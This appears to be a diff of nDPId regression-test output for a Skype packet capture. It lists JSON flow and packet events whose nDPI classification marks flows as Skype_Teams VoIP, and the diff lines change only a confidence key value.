00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+WsgAAEARoKjAqAEib91NlzLdnFsAKnZMm+IChMIMA7Iu2mZsqQZJnqfJooyOMKE\/uWGoix8bU\/YAAA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/HyoAAEARyHDAqAEinTg0ETLdnE0AK6EGm+QCNgMH2ITpxVJW+XmKXJHtTvzd6uYJCxFPw1m4ZheLNng="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2iHEAAEAR2M3AqAEiQAQXqjLdnEsAIkoGm+YCpGAFhs2RBCMUexQexYbsFkqmQ\/8Qtyc="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2+lgAAEARAQ\/AqAEib91NqDLdnEcAIop9m+gChrJ8v\/omTh7Ne4Bar5T53RvLKUpGcwE="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5wkwAAEARPJTAqAEib91KLDLdnF8AJV5Dm+oCagLaZIeW7H9EIxc7czPbdaN+lYkEZAqCu0Q="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAABBe8QAAEARtE3AqAEinTfrmDLdnEEALXlam+wCJAhMYE3a2mA+K8Gsvq1dkqSohtdF5WONseMrsTgQWNCbqg=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PtsAAEAR8UnAqAEinTfrkjLdgQkAINq8m+4CkuZLUb2HgW9IroWQ+JaU9ew2O1bn"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/GQkAAEARSEjAqAEiQAQXjzLdnFIAK+Dtm\/ACn46vTpwjXGMZ9bJtrKD0Tox8o\/uW9MNcEfVIZROhfxw="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+3+IAAEARuLHAqAEiQTffGTLdnFwAKrqUm\/ICs3eZ5yAavzTYAFVG6cHtvks6WRTX6quz\/un4rGT7CA=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/8JUAAEAR8n\/AqAEinTc4lzLdnFsAK42nm\/QCY347bApK+fSJyR3vpMK2pFmarm3qJcKY67tEOMSW2tE="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663377,"flow_last_seen":1431969663377,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969663377,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1431969663377,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969663377,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1DJAAEAGhNzAqAEinTeCp8N8nF+W1hb6AAAAALAC\/\/8sigAAAgQFtAEDAwUBAQgKPiLc+gAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy1ywAAEARC+fAqAEinTc4pjLdnFYAHmpym\/YCUIZT7d8ZZahDgzlHGwrFeQgMHw=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 